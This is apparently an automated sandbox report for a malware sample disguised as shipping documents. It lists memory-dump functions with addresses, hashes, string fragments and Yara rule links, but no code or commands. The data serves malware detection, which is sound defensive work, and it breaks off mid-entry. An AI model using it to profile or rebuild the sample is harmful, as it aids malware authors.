Opcode Fuzzy Hash: a99c8790e8a37fd03841db6fbd312da26b3d3b4613f92aba0e71a718c901b0db
Instruction Fuzzy Hash: D3D05E30C11208EFCB55EBB595052ADBFF8AF01302F6041E9C80026241DA7A9A50DFA1

Function 06A90B8B Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95401323ec9c91fb425bd28a803ccadc871d7b193dd5999e44e4475afc7b95df
Instruction ID: f948110e2a006e2dbbb330b856cff90ab670c36831a0cbdeb88ce26879e48e90
Opcode Fuzzy Hash: 95401323ec9c91fb425bd28a803ccadc871d7b193dd5999e44e4475afc7b95df
Instruction Fuzzy Hash: 16D0A77096D220CFEB44DB52C4459E97BFDAB4E341711D1AA80498B253D3384801CB60

Function 06A97AB8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bae1ff2b23158aff89423f2a0b6f2a42c2717154cf43e25f4dc0a56bed90def2
Instruction ID: c3b1b83985dd334050969d563c114e7d6d7a9781adc9c7bc8b69224f3b2f5cde
Opcode Fuzzy Hash: bae1ff2b23158aff89423f2a0b6f2a42c2717154cf43e25f4dc0a56bed90def2
Instruction Fuzzy Hash: 44D0C771D15108EFC750EFA9D50575D7BF8EB08311F144595D814D3601E6759E10EB61

Function 06A98BB8 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418bbecdf2e2e7da8d28b246a60bc8f15871e71bdb73a23045b5ab9c8b734134
Instruction ID: fbd566a37dcd84bd32794d30e0e976889f70b31b0b66a2778996121e0ca62005
Opcode Fuzzy Hash: 418bbecdf2e2e7da8d28b246a60bc8f15871e71bdb73a23045b5ab9c8b734134
Instruction Fuzzy Hash: DFC0127091110C9BC714EB99D801A6E777CDB41625F544199D40853251DA755D10DBA6

Function 06A97328 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1badfdeb9893ac278b9e4ff737c5640c51cbc1b39404243c689036ae77ef637d
Instruction ID: 892f7dd353c48250241648ff043bf85de2a6f93e18ea301f24ab90309622fc86
Opcode Fuzzy Hash: 1badfdeb9893ac278b9e4ff737c5640c51cbc1b39404243c689036ae77ef637d
Instruction Fuzzy Hash: 9BD0227082020CDFC710EBA5D406A5AB77DEB01312F000198D80843201CF765D00DBA0

Function 06A9649E Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 768937f9363fd7b409855b1dd1ec2008e49bd02df313bd8f255ac982414ef5f7
Instruction ID: 4957d2b0892e57f08f623a516ba67b99d7d2b5243b04e61b3055ab7e4f899e3d
Opcode Fuzzy Hash: 768937f9363fd7b409855b1dd1ec2008e49bd02df313bd8f255ac982414ef5f7
Instruction Fuzzy Hash: C4D0C93515E3548FFB46AB24989C9B47BB8BF07205729A29A844A0B0938A204405CA10

Function 06A9EA00 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 328bf7efdaa4eb8bccb1d323b220d51c8b9326b3d2ff803d9a4ea751cfe2e788
Instruction ID: 87601307c7d64aa86e623a13f687038fc1d86a6b9b971c52398a677c0a573547
Opcode Fuzzy Hash: 328bf7efdaa4eb8bccb1d323b220d51c8b9326b3d2ff803d9a4ea751cfe2e788
Instruction Fuzzy Hash: 11C012324443094AC949FF65F94591D7BAEFA84204750C530B1064A52EDF78AD488690

Function 06A97CBB Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1022c08f9f2ec383bd387e67c6e57f325ecf949bfabd65eeff8375790ad67e3
Instruction ID: acdcea65f21d6e5653b055949768508072249ac11ac31375f1e0ad3d4369c259
Opcode Fuzzy Hash: b1022c08f9f2ec383bd387e67c6e57f325ecf949bfabd65eeff8375790ad67e3
Instruction Fuzzy Hash: EDC09B35A45028DFDF009AC4F5460FCB739EBCA667F101061D60D92051C72059188650

Function 06A964C1 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4de840da20b4b223c3c76ea94c5aceffffca4dcdf05fdfce6db52d221690e15c
Instruction ID: b5c4efe427e65c0c42eddcfd9732aec94c5f6b62c2bae32518adea8c8b66b817
Opcode Fuzzy Hash: 4de840da20b4b223c3c76ea94c5aceffffca4dcdf05fdfce6db52d221690e15c
Instruction Fuzzy Hash: 3CC09B32049210CFFB45BB30E89D47A76BDFF0F3067A07D14921F560074B144414C5B0

Function 06A90633 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ca592d924adb43a823f91fb1ceb4c4c95eae5ff59278d1fc6c6f9e968b259e
Instruction ID: 0ea0a5119a8fd5550a9a9d2e25a4efe73568fd94ef9b47cdaf4b67e2c8e2b4cb
Opcode Fuzzy Hash: 37ca592d924adb43a823f91fb1ceb4c4c95eae5ff59278d1fc6c6f9e968b259e
Instruction Fuzzy Hash: F3C08CB000D110CFCF54AF64D48C0147638FB0630271004F9C90A0A02B8B32C000CFA1

Function 06A90535 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46981c5e9ce1cdadc425b1b44273daac6cf479fba0583ff8ece420fd6e6cf527
Instruction ID: bb563b16139843da497cf269351a0f6e428510122fcd76adb8f173deeab3624f
Opcode Fuzzy Hash: 46981c5e9ce1cdadc425b1b44273daac6cf479fba0583ff8ece420fd6e6cf527
Instruction Fuzzy Hash: 8AC04C7000D5909FDB515B64D8AD172BBB4FF0B24171440F6C95D4E06BC3654A41EFB2

Function 06A96663 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1715ad17dcdd27f6c14dee1a3173bb61d98facb8526e7b1c7af62cc8a10c86f7
Instruction ID: 91ce56fbd873f01662d9c242eb56bcb73ade421b0b2382f927142803884d9c1b
Opcode Fuzzy Hash: 1715ad17dcdd27f6c14dee1a3173bb61d98facb8526e7b1c7af62cc8a10c86f7
Instruction Fuzzy Hash: 64A002BD15A404EEFA91252C840C6B8A6A9EF053093B43145925B86996C79142114954

Non-executed Functions

Function 044D7128 Relevance: 11.7, Strings: 9, Instructions: 461COMMON

Download Yara Rule

Strings

PH]q, xrefs: 044D7749
PH]q, xrefs: 044D775D
PH]q, xrefs: 044D7662
PH]q, xrefs: 044D7475
", xrefs: 044D78FE
PH]q, xrefs: 044D7559
PH]q, xrefs: 044D764E
PH]q, xrefs: 044D7461
PH]q, xrefs: 044D756D

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: "$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
API String ID: 0-3604444728
Opcode ID: 95fe8f971e7fd0693654b4ccbed3d57efdccd7af2d9e3cc3dd793f759228e6cf
Instruction ID: cd4a64e873053fe7894e7238b31b8e8af015cec1820bd500835ed0077735372a
Opcode Fuzzy Hash: 95fe8f971e7fd0693654b4ccbed3d57efdccd7af2d9e3cc3dd793f759228e6cf
Instruction Fuzzy Hash: 8132B274E01218CFDB64DF69D994B9DBBB2BF89300F1080AAD909AB365DB355E85CF10

Function 044D7118 Relevance: 11.6, Strings: 9, Instructions: 367COMMON

Download Yara Rule

Strings

PH]q, xrefs: 044D7749
PH]q, xrefs: 044D775D
PH]q, xrefs: 044D7662
PH]q, xrefs: 044D7475
", xrefs: 044D78FE
PH]q, xrefs: 044D7559
PH]q, xrefs: 044D764E
PH]q, xrefs: 044D7461
PH]q, xrefs: 044D756D

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: "$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
API String ID: 0-3604444728
Opcode ID: b0aadacd3d0de07c2012ada85f1e6fb8ff8fd3bed337a8d99e3917106f9d8657
Instruction ID: cd80355a43d9cb872a58a869d38c64a8fc10bb2e01eabcd53d908cd7c5cb887a
Opcode Fuzzy Hash: b0aadacd3d0de07c2012ada85f1e6fb8ff8fd3bed337a8d99e3917106f9d8657
Instruction Fuzzy Hash: C602C074E012188FDB58DF69D994B9DBBF2BF89300F1084A9D809AB365DB359E85CF10

Function 073D8700 Relevance: 4.0, Strings: 3, Instructions: 241COMMON

Download Yara Rule

Strings

TJbq, xrefs: 073D88B6
xb`q, xrefs: 073D8840
Te]q, xrefs: 073D8F67

Memory Dump Source

Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: TJbq$Te]q$xb`q
API String ID: 0-1930611328
Opcode ID: f5654036a81edcafe47df0902aaf02f9935f5b342840d5067cc592897e8ef516
Instruction ID: 2fb3d6f8ed8f1f5136da8813924313716a409d1140408417f227c55701d9b50d
Opcode Fuzzy Hash: f5654036a81edcafe47df0902aaf02f9935f5b342840d5067cc592897e8ef516
Instruction Fuzzy Hash: 6EC174B5E006188FDB58DF6AD944ADDBBF2BF89300F14C0A9D509AB365DB305E858F50

Function 0A157500 Relevance: 1.8, Strings: 1, Instructions: 596COMMON

Download Yara Rule

Strings

.5uq, xrefs: 0A15761B

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: .5uq
API String ID: 0-910421107
Opcode ID: 6e3b845331707160f79df6f6fa8a6a4d8746f917e5e3efedbeb7ef00a506d105
Instruction ID: 427132858740a4ae5cce695fb4fe0a0756afbd0a6d69a2d91edd51f1286128be
Opcode Fuzzy Hash: 6e3b845331707160f79df6f6fa8a6a4d8746f917e5e3efedbeb7ef00a506d105
Instruction Fuzzy Hash: C7529C74E01229CFDB64DF69C884B9DBBB2BB89300F1085E9D809AB355DB359E85CF50

Function 04460040 Relevance: 1.6, Strings: 1, Instructions: 367COMMON

Download Yara Rule

Strings

", xrefs: 0446055E

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 1d65f9a6fcacb1cadf4583637ef0fb3793100f922f4f9a09e8383e9d841912ed
Instruction ID: 254bb475207f2629a9e16050694ee5cc7e79c9e7d37442a22c7f9929d5b9057e
Opcode Fuzzy Hash: 1d65f9a6fcacb1cadf4583637ef0fb3793100f922f4f9a09e8383e9d841912ed
Instruction Fuzzy Hash: F5F11370E002188BEF14CFA9C4847DEBBB2AF88315F64C16AD419AB396D774A985CF51

Function 073D8418 Relevance: 1.4, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

4']q, xrefs: 073D84FA

Memory Dump Source

Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: dbad95034e7c73e03716d3775183132bbc2994ea015b8cfc4da4effefb0b6d4c
Instruction ID: 1c14dcf22486c2498d46b24249f7800d82a413d8c5553f0f1638632d52626785
Opcode Fuzzy Hash: dbad95034e7c73e03716d3775183132bbc2994ea015b8cfc4da4effefb0b6d4c
Instruction Fuzzy Hash: 0D61DA74E002058FD708EF7AEA4169ABFF6FBC9304F14C539D405AB269DB78A909CB51

Function 073D8428 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

4']q, xrefs: 073D84FA

Memory Dump Source

Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: b6e0d10ddd957dcc4eb6aea7e1fe2f6c827c3ed79e48fab168895c59605617c7
Instruction ID: 05df91a8f30141ddb3ee3fbe6119f6456cd39cc4072abf12a384cf51f9ac53bd
Opcode Fuzzy Hash: b6e0d10ddd957dcc4eb6aea7e1fe2f6c827c3ed79e48fab168895c59605617c7
Instruction Fuzzy Hash: E261DA74E002098FD708EF7AE94069ABFF6FBC9304F14C539D405AB269DB78A909CB51

Function 0A1574EF Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

.5uq, xrefs: 0A15761B

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: .5uq
API String ID: 0-910421107
Opcode ID: 38dc577df4b0075ef04327dc45c49072f435f5358dbbc2fe26b5e3701a46215b
Instruction ID: 6b58a9eaab98fd5996751738aa100a0b387e7fdb0360e90bf46867af83528a62
Opcode Fuzzy Hash: 38dc577df4b0075ef04327dc45c49072f435f5358dbbc2fe26b5e3701a46215b
Instruction Fuzzy Hash: 4061C874D01219CFDB28DF66D940BADBBB6BF88300F10C4A9D8186B766DB355A85DF40

Function 0446ABB8 Relevance: .7, Instructions: 693COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dbb8b22542f896a02b2109aae55ccb767b615489005aeddcdd2c11ddc5f63ac
Instruction ID: 9e65b075ea7cacf365dcce804357b8d48bc82d5821fbaf39a3170897f0e45d8d
Opcode Fuzzy Hash: 3dbb8b22542f896a02b2109aae55ccb767b615489005aeddcdd2c11ddc5f63ac
Instruction Fuzzy Hash: F8826B74E012299FDB64DF69CD94BDDBBB2BB88300F1481E9940DA7265DB34AE81CF41

Function 044D5EC8 Relevance: .7, Instructions: 677COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f49524696d5e125b613db6d35158a109ce244c10d3fb2f4611cff243c1c5df
Instruction ID: 568e13ffee5c7291537cb4a05ca4d40d2538b9c314a4cc0c1773c468322f04d9
Opcode Fuzzy Hash: 51f49524696d5e125b613db6d35158a109ce244c10d3fb2f4611cff243c1c5df
Instruction Fuzzy Hash: AE728B74E012288FDB65DF69CD94BDABBB2BF89300F1080E9A44DA7265DB305E81CF41

Function 04B12438 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4536673855.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b10000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 056364774847b4e18e9ab71a4d6715cf8c84e787e4bf751081ea87fe832f8286
Instruction ID: e777c3dcae2944338e3cf08af2f6d376671f8efc6e0f86aaf8198d7863a2bf69
Opcode Fuzzy Hash: 056364774847b4e18e9ab71a4d6715cf8c84e787e4bf751081ea87fe832f8286
Instruction Fuzzy Hash: 331283B0512F458AE710CF65EE4C38D7BB2BB89319BA0420BD2616F2F5DBB4154ACF64

Function 06A934E0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3c77e213247f5a293958f625d583535ddc5e9a18d8d3072618b71e70ba5cd22
Instruction ID: e9cbe10d504cacf23f1733fe9ffdab32700102f29c6bfe48071825c32b24670d
Opcode Fuzzy Hash: b3c77e213247f5a293958f625d583535ddc5e9a18d8d3072618b71e70ba5cd22
Instruction Fuzzy Hash: D1E1D474E002198FDB14DFA9C5809AEFBF2BF89305F24C169D415AB356D731A982CFA1

Function 06A94D20 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4109f6d0c0050e72bca640e03c8148901f8a83239251724a5106505eab5743ab
Instruction ID: 899a5957c45e4ebf300912b238dbc77423979ec0bf4576edb6162d2b800b972c
Opcode Fuzzy Hash: 4109f6d0c0050e72bca640e03c8148901f8a83239251724a5106505eab5743ab
Instruction Fuzzy Hash: E3E1E574E002198FDB14DFA9C5809AEFBF2FF89305F248169D415AB356D731A982CFA1

Function 06A930A8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e53a25ba3f7a54ac662969aaca25731caf5b59e5f861de119dcc929c7d9e26
Instruction ID: e215f5be15b290093d448a3e6d22bec5d691b006614bf52d3134b114607bdacb
Opcode Fuzzy Hash: 00e53a25ba3f7a54ac662969aaca25731caf5b59e5f861de119dcc929c7d9e26
Instruction Fuzzy Hash: 7AE1D374E002198FDB54DFA9C5809AEFBF2BF89305F24C169D414AB356DB31A981CFA1

Function 06A93918 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acc8fce2da27ad24fd85172325544a05a2c1e63c6fea7a3157cc95e0a244552d
Instruction ID: 9afca693f27f7841d69a464fb9b848807a923b6d5ab4139e90ed4a0d383287bd
Opcode Fuzzy Hash: acc8fce2da27ad24fd85172325544a05a2c1e63c6fea7a3157cc95e0a244552d
Instruction Fuzzy Hash: FDE1D474E002198FDF54DFA9C5809AEFBF2BF89305F248169D414AB356DB31A981CFA1

Function 06A95158 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2bb77a8604fa938e57b467ce4ce2fe6ae7d78bd5b3482de31f25d72b4f59277
Instruction ID: 21ed52d561186056af1717e52de49084f4bc3385f9243d340eb4494e384531a7
Opcode Fuzzy Hash: a2bb77a8604fa938e57b467ce4ce2fe6ae7d78bd5b3482de31f25d72b4f59277
Instruction Fuzzy Hash: C7E1E674E002198FCB55DFA9C5819AEFBF2BF89305F24C169D814AB356D730A981CFA1

Function 04468048 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d921aed98947c0d238391a6c5d3387204b944df34a60324b389541d4f13f4fa
Instruction ID: e074ac6f6dce0b923a0d36cbeec41ef5c47b8cbefcbc2b09c2848b866236d4ef
Opcode Fuzzy Hash: 6d921aed98947c0d238391a6c5d3387204b944df34a60324b389541d4f13f4fa
Instruction Fuzzy Hash: BDC1C074E01218CFDB54DFA5D994B9DBBB2BF89300F1080AAD809AB355DB35AE85CF11

Function 04469A58 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deed894969849e59e95e4158e30b5d4290189834c7c369f93d14b5b4acd954b4
Instruction ID: 8ac9d37aa9effffda5bf03287ff339c3f002fb284832a59c06c6b69aa36e55ab
Opcode Fuzzy Hash: deed894969849e59e95e4158e30b5d4290189834c7c369f93d14b5b4acd954b4
Instruction Fuzzy Hash: 19C1B074E01218CFDB54DFA5C994B9DBBB2BF89300F1080AAD809AB355DB35AE85CF51

Function 04469600 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 002384790286946e7c00ed0bafcd4faf33fe661c22c26633208d8e44f019e14a
Instruction ID: f79b5e00716842dc02106bb0d4f9cf61d113de0e9728ce0ca888264cec53a48e
Opcode Fuzzy Hash: 002384790286946e7c00ed0bafcd4faf33fe661c22c26633208d8e44f019e14a
Instruction Fuzzy Hash: F7C1BF74E01218CFDB54DFA5C994B9DBBB2BF89300F1080AAD809AB355DB35AE85CF51

Function 0446EA20 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfe40f6c2b4413f26f80f482bd2d4879c8b5fd19b4e2da9ad62722ac266f600e
Instruction ID: 6ac6ada863be9667d1e0740aca11b3e6c3d09d9e12b2ea880254e25f2196d7a1
Opcode Fuzzy Hash: bfe40f6c2b4413f26f80f482bd2d4879c8b5fd19b4e2da9ad62722ac266f600e
Instruction Fuzzy Hash: 22C1B174E01218CFDB54DFA5C984B9DBBF2BF89304F2080AAD809AB355DB35A985CF51

Function 04464C28 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 470995f5cb2c583406a1a6e0eb9a2d5071719f9d130a6c8759b243cc8eb91db7
Instruction ID: 3fb36c850b08f1889b75308f9a73bab465f696b058b6dfc0d3590e816478de70
Opcode Fuzzy Hash: 470995f5cb2c583406a1a6e0eb9a2d5071719f9d130a6c8759b243cc8eb91db7
Instruction Fuzzy Hash: BBC1C174E01218CFDB54DFA5D984B9DBBB2BF89300F1080AAD809AB355DB35AE85CF51

Function 0446C628 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c30d3ed86a67a1afce7a9a3b6724a5f4d9d0921b3626003c803030d36f8ffcc
Instruction ID: 0074464a568bf4c93499c22d493a58aaaa8f3f0b863e69b8e469e6ff6b9010f1
Opcode Fuzzy Hash: 1c30d3ed86a67a1afce7a9a3b6724a5f4d9d0921b3626003c803030d36f8ffcc
Instruction Fuzzy Hash: B5C1C174E01218CFDB54DFA5D984B9DBBB2BF89300F1080AAD809AB355DB35AE85CF51

Function 04466638 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71cd16f3ede2421fd563288f344ec8e7ecfec3874d102a0e0aeec8555dbaba1a
